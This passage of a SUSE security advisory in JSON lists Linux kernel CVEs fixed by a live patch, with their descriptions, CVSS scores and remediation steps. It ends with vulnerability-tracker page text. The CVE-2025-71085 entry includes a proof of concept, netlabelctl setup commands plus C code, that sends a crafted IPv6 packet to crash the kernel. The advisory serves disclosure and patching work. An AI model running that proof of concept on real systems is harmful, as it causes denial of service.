"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_6-default-11-150700.2.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-27T16:04:11Z",
"details": "important"
}
],
"title": "CVE-2025-40258"
},
{
"cve": "CVE-2025-40284",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40284"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nBluetooth: MGMT: cancel mesh send timer when hdev removed\n\nmesh_send_done timer is not canceled when hdev is removed, which causes\ncrash if the timer triggers after hdev is gone.\n\nCancel the timer when MGMT removes the hdev, like other MGMT timers.\n\nShould fix the BUG: sporadically seen by BlueZ test bot\n(in \"Mesh - Send cancel - 1\" test).\n\nLog:\n------\nBUG: KASAN: slab-use-after-free in run_timer_softirq+0x76b/0x7d0\n...\nFreed by task 36:\n kasan_save_stack+0x24/0x50\n kasan_save_track+0x14/0x30\n __kasan_save_free_info+0x3a/0x60\n __kasan_slab_free+0x43/0x70\n kfree+0x103/0x500\n device_release+0x9a/0x210\n kobject_put+0x100/0x1e0\n vhci_release+0x18b/0x240\n------",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_6-default-11-150700.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_6-default-11-150700.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_6-default-11-150700.2.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40284",
"url": "https://www.suse.com/security/cve/CVE-2025-40284"
},
{
"category": "external",
"summary": "SUSE Bug 1254860 for CVE-2025-40284",
"url": "https://bugzilla.suse.com/1254860"
},
{
"category": "external",
"summary": "SUSE Bug 1257669 for CVE-2025-40284",
"url": "https://bugzilla.suse.com/1257669"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_6-default-11-150700.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_6-default-11-150700.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_6-default-11-150700.2.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.8,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_6-default-11-150700.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_6-default-11-150700.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_6-default-11-150700.2.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-27T16:04:11Z",
"details": "important"
}
],
"title": "CVE-2025-40284"
},
{
"cve": "CVE-2025-40297",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40297"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: bridge: fix use-after-free due to MST port state bypass\n\nsyzbot reported[1] a use-after-free when deleting an expired fdb. It is\ndue to a race condition between learning still happening and a port being\ndeleted, after all its fdbs have been flushed. The port\u0027s state has been\ntoggled to disabled so no learning should happen at that time, but if we\nhave MST enabled, it will bypass the port\u0027s state, that together with VLAN\nfiltering disabled can lead to fdb learning at a time when it shouldn\u0027t\nhappen while the port is being deleted. VLAN filtering must be disabled\nbecause we flush the port VLANs when it\u0027s being deleted which will stop\nlearning. This fix adds a check for the port\u0027s vlan group which is\ninitialized to NULL when the port is getting deleted, that avoids the port\nstate bypass. When MST is enabled there would be a minimal new overhead\nin the fast-path because the port\u0027s vlan group pointer is cache-hot.\n\n[1] https://syzkaller.appspot.com/bug?extid=dd280197f0f7ab3917be",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_6-default-11-150700.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_6-default-11-150700.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_6-default-11-150700.2.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40297",
"url": "https://www.suse.com/security/cve/CVE-2025-40297"
},
{
"category": "external",
"summary": "SUSE Bug 1255187 for CVE-2025-40297",
"url": "https://bugzilla.suse.com/1255187"
},
{
"category": "external",
"summary": "SUSE Bug 1255895 for CVE-2025-40297",
"url": "https://bugzilla.suse.com/1255895"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_6-default-11-150700.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_6-default-11-150700.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_6-default-11-150700.2.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_6-default-11-150700.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_6-default-11-150700.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_6-default-11-150700.2.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-27T16:04:11Z",
"details": "important"
}
],
"title": "CVE-2025-40297"
},
{
"cve": "CVE-2025-68284",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68284"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nlibceph: prevent potential out-of-bounds writes in handle_auth_session_key()\n\nThe len field originates from untrusted network packets. Boundary\nchecks have been added to prevent potential out-of-bounds writes when\ndecrypting the connection secret or processing service tickets.\n\n[ idryomov: changelog ]",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_6-default-11-150700.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_6-default-11-150700.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_6-default-11-150700.2.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68284",
"url": "https://www.suse.com/security/cve/CVE-2025-68284"
},
{
"category": "external",
"summary": "SUSE Bug 1255377 for CVE-2025-68284",
"url": "https://bugzilla.suse.com/1255377"
},
{
"category": "external",
"summary": "SUSE Bug 1255378 for CVE-2025-68284",
"url": "https://bugzilla.suse.com/1255378"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_6-default-11-150700.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_6-default-11-150700.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_6-default-11-150700.2.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.3,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_6-default-11-150700.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_6-default-11-150700.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_6-default-11-150700.2.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-27T16:04:11Z",
"details": "important"
}
],
"title": "CVE-2025-68284"
},
{
"cve": "CVE-2025-68285",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68285"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nlibceph: fix potential use-after-free in have_mon_and_osd_map()\n\nThe wait loop in __ceph_open_session() can race with the client\nreceiving a new monmap or osdmap shortly after the initial map is\nreceived. Both ceph_monc_handle_map() and handle_one_map() install\na new map immediately after freeing the old one\n\n kfree(monc-\u003emonmap);\n monc-\u003emonmap = monmap;\n\n ceph_osdmap_destroy(osdc-\u003eosdmap);\n osdc-\u003eosdmap = newmap;\n\nunder client-\u003emonc.mutex and client-\u003eosdc.lock respectively, but\nbecause neither is taken in have_mon_and_osd_map() it\u0027s possible for\nclient-\u003emonc.monmap-\u003eepoch and client-\u003eosdc.osdmap-\u003eepoch arms in\n\n client-\u003emonc.monmap \u0026\u0026 client-\u003emonc.monmap-\u003eepoch \u0026\u0026\n client-\u003eosdc.osdmap \u0026\u0026 client-\u003eosdc.osdmap-\u003eepoch;\n\ncondition to dereference an already freed map. This happens to be\nreproducible with generic/395 and generic/397 with KASAN enabled:\n\n BUG: KASAN: slab-use-after-free in have_mon_and_osd_map+0x56/0x70\n Read of size 4 at addr ffff88811012d810 by task mount.ceph/13305\n CPU: 2 UID: 0 PID: 13305 Comm: mount.ceph Not tainted 6.14.0-rc2-build2+ #1266\n ...\n Call Trace:\n \u003cTASK\u003e\n have_mon_and_osd_map+0x56/0x70\n ceph_open_session+0x182/0x290\n ceph_get_tree+0x333/0x680\n vfs_get_tree+0x49/0x180\n do_new_mount+0x1a3/0x2d0\n path_mount+0x6dd/0x730\n do_mount+0x99/0xe0\n __do_sys_mount+0x141/0x180\n do_syscall_64+0x9f/0x100\n entry_SYSCALL_64_after_hwframe+0x76/0x7e\n \u003c/TASK\u003e\n\n Allocated by task 13305:\n ceph_osdmap_alloc+0x16/0x130\n ceph_osdc_init+0x27a/0x4c0\n ceph_create_client+0x153/0x190\n create_fs_client+0x50/0x2a0\n ceph_get_tree+0xff/0x680\n vfs_get_tree+0x49/0x180\n do_new_mount+0x1a3/0x2d0\n path_mount+0x6dd/0x730\n do_mount+0x99/0xe0\n __do_sys_mount+0x141/0x180\n do_syscall_64+0x9f/0x100\n entry_SYSCALL_64_after_hwframe+0x76/0x7e\n\n Freed by task 9475:\n kfree+0x212/0x290\n handle_one_map+0x23c/0x3b0\n ceph_osdc_handle_map+0x3c9/0x590\n mon_dispatch+0x655/0x6f0\n ceph_con_process_message+0xc3/0xe0\n ceph_con_v1_try_read+0x614/0x760\n ceph_con_workfn+0x2de/0x650\n process_one_work+0x486/0x7c0\n process_scheduled_works+0x73/0x90\n worker_thread+0x1c8/0x2a0\n kthread+0x2ec/0x300\n ret_from_fork+0x24/0x40\n ret_from_fork_asm+0x1a/0x30\n\nRewrite the wait loop to check the above condition directly with\nclient-\u003emonc.mutex and client-\u003eosdc.lock taken as appropriate. While\nat it, improve the timeout handling (previously mount_timeout could be\nexceeded in case wait_event_interruptible_timeout() slept more than\nonce) and access client-\u003eauth_err under client-\u003emonc.mutex to match\nhow it\u0027s set in finish_auth().\n\nmonmap_show() and osdmap_show() now take the respective lock before\naccessing the map as well.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_6-default-11-150700.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_6-default-11-150700.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_6-default-11-150700.2.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68285",
"url": "https://www.suse.com/security/cve/CVE-2025-68285"
},
{
"category": "external",
"summary": "SUSE Bug 1255401 for CVE-2025-68285",
"url": "https://bugzilla.suse.com/1255401"
},
{
"category": "external",
"summary": "SUSE Bug 1255402 for CVE-2025-68285",
"url": "https://bugzilla.suse.com/1255402"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_6-default-11-150700.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_6-default-11-150700.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_6-default-11-150700.2.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_6-default-11-150700.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_6-default-11-150700.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_6-default-11-150700.2.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-27T16:04:11Z",
"details": "important"
}
],
"title": "CVE-2025-68285"
},
{
"cve": "CVE-2025-68813",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68813"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nipvs: fix ipv4 null-ptr-deref in route error path\n\nThe IPv4 code path in __ip_vs_get_out_rt() calls dst_link_failure()\nwithout ensuring skb-\u003edev is set, leading to a NULL pointer dereference\nin fib_compute_spec_dst() when ipv4_link_failure() attempts to send\nICMP destination unreachable messages.\n\nThe issue emerged after commit ed0de45a1008 (\"ipv4: recompile ip options\nin ipv4_link_failure\") started calling __ip_options_compile() from\nipv4_link_failure(). This code path eventually calls fib_compute_spec_dst()\nwhich dereferences skb-\u003edev. An attempt was made to fix the NULL skb-\u003edev\ndereference in commit 0113d9c9d1cc (\"ipv4: fix null-deref in\nipv4_link_failure\"), but it only addressed the immediate dev_net(skb-\u003edev)\ndereference by using a fallback device. The fix was incomplete because\nfib_compute_spec_dst() later in the call chain still accesses skb-\u003edev\ndirectly, which remains NULL when IPVS calls dst_link_failure().\n\nThe crash occurs when:\n1. IPVS processes a packet in NAT mode with a misconfigured destination\n2. Route lookup fails in __ip_vs_get_out_rt() before establishing a route\n3. The error path calls dst_link_failure(skb) with skb-\u003edev == NULL\n4. ipv4_link_failure() -\u003e ipv4_send_dest_unreach() -\u003e\n __ip_options_compile() -\u003e fib_compute_spec_dst()\n5. fib_compute_spec_dst() dereferences NULL skb-\u003edev\n\nApply the same fix used for IPv6 in commit 326bf17ea5d4 (\"ipvs: fix\nipv6 route unreach panic\"): set skb-\u003edev from skb_dst(skb)-\u003edev before\ncalling dst_link_failure().\n\nKASAN: null-ptr-deref in range [0x0000000000000328-0x000000000000032f]\nCPU: 1 PID: 12732 Comm: syz.1.3469 Not tainted 6.6.114 #2\nRIP: 0010:__in_dev_get_rcu include/linux/inetdevice.h:233\nRIP: 0010:fib_compute_spec_dst+0x17a/0x9f0 net/ipv4/fib_frontend.c:285\nCall Trace:\n \u003cTASK\u003e\n spec_dst_fill net/ipv4/ip_options.c:232\n spec_dst_fill net/ipv4/ip_options.c:229\n __ip_options_compile+0x13a1/0x17d0 net/ipv4/ip_options.c:330\n ipv4_send_dest_unreach net/ipv4/route.c:1252\n ipv4_link_failure+0x702/0xb80 net/ipv4/route.c:1265\n dst_link_failure include/net/dst.h:437\n __ip_vs_get_out_rt+0x15fd/0x19e0 net/netfilter/ipvs/ip_vs_xmit.c:412\n ip_vs_nat_xmit+0x1d8/0xc80 net/netfilter/ipvs/ip_vs_xmit.c:764",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_6-default-11-150700.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_6-default-11-150700.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_6-default-11-150700.2.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68813",
"url": "https://www.suse.com/security/cve/CVE-2025-68813"
},
{
"category": "external",
"summary": "SUSE Bug 1256641 for CVE-2025-68813",
"url": "https://bugzilla.suse.com/1256641"
},
{
"category": "external",
"summary": "SUSE Bug 1256644 for CVE-2025-68813",
"url": "https://bugzilla.suse.com/1256644"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_6-default-11-150700.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_6-default-11-150700.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_6-default-11-150700.2.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_6-default-11-150700.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_6-default-11-150700.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_6-default-11-150700.2.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-27T16:04:11Z",
"details": "important"
}
],
"title": "CVE-2025-68813"
},
{
"cve": "CVE-2025-71085",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71085"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nipv6: BUG() in pskb_expand_head() as part of calipso_skbuff_setattr()\n\nThere exists a kernel oops caused by a BUG_ON(nhead \u003c 0) at\nnet/core/skbuff.c:2232 in pskb_expand_head().\nThis bug is triggered as part of the calipso_skbuff_setattr()\nroutine when skb_cow() is passed headroom \u003e INT_MAX\n(i.e. (int)(skb_headroom(skb) + len_delta) \u003c 0).\n\nThe root cause of the bug is due to an implicit integer cast in\n__skb_cow(). The check (headroom \u003e skb_headroom(skb)) is meant to ensure\nthat delta = headroom - skb_headroom(skb) is never negative, otherwise\nwe will trigger a BUG_ON in pskb_expand_head(). However, if\nheadroom \u003e INT_MAX and delta \u003c= -NET_SKB_PAD, the check passes, delta\nbecomes negative, and pskb_expand_head() is passed a negative value for\nnhead.\n\nFix the trigger condition in calipso_skbuff_setattr(). Avoid passing\n\"negative\" headroom sizes to skb_cow() within calipso_skbuff_setattr()\nby only using skb_cow() to grow headroom.\n\nPoC:\n\tUsing `netlabelctl` tool:\n\n netlabelctl map del default\n netlabelctl calipso add pass doi:7\n netlabelctl map add default address:0::1/128 protocol:calipso,7\n\n Then run the following PoC:\n\n int fd = socket(AF_INET6, SOCK_DGRAM, IPPROTO_UDP);\n\n // setup msghdr\n int cmsg_size = 2;\n int cmsg_len = 0x60;\n struct msghdr msg;\n struct sockaddr_in6 dest_addr;\n struct cmsghdr * cmsg = (struct cmsghdr *) calloc(1,\n sizeof(struct cmsghdr) + cmsg_len);\n msg.msg_name = \u0026dest_addr;\n msg.msg_namelen = sizeof(dest_addr);\n msg.msg_iov = NULL;\n msg.msg_iovlen = 0;\n msg.msg_control = cmsg;\n msg.msg_controllen = cmsg_len;\n msg.msg_flags = 0;\n\n // setup sockaddr\n dest_addr.sin6_family = AF_INET6;\n dest_addr.sin6_port = htons(31337);\n dest_addr.sin6_flowinfo = htonl(31337);\n dest_addr.sin6_addr = in6addr_loopback;\n dest_addr.sin6_scope_id = 31337;\n\n // setup cmsghdr\n cmsg-\u003ecmsg_len = cmsg_len;\n cmsg-\u003ecmsg_level = IPPROTO_IPV6;\n cmsg-\u003ecmsg_type = IPV6_HOPOPTS;\n char * hop_hdr = (char *)cmsg + sizeof(struct cmsghdr);\n hop_hdr[1] = 0x9; //set hop size - (0x9 + 1) * 8 = 80\n\n sendmsg(fd, \u0026msg, 0);",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_6-default-11-150700.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_6-default-11-150700.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_6-default-11-150700.2.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71085",
"url": "https://www.suse.com/security/cve/CVE-2025-71085"
},
{
"category": "external",
"summary": "SUSE Bug 1256623 for CVE-2025-71085",
"url": "https://bugzilla.suse.com/1256623"
},
{
"category": "external",
"summary": "SUSE Bug 1256624 for CVE-2025-71085",
"url": "https://bugzilla.suse.com/1256624"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_6-default-11-150700.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_6-default-11-150700.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_6-default-11-150700.2.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_6-default-11-150700.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_6-default-11-150700.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_6-default-11-150700.2.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-27T16:04:11Z",
"details": "important"
}
],
"title": "CVE-2025-71085"
}
]
}
Loading…
Trend slope:
-
(linear fit over daily sighting counts)
Show additional events:
Loading…
Experimental. This forecast is provided for visualization only and may change without notice. Do not use it for operational decisions.
Forecast uses a logistic model when the trend is rising, or an exponential decay model when the trend is falling. Fitted via linearized least squares.
Sightings
| Author | Source | Type | Date | Other |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.
Loading…
Loading…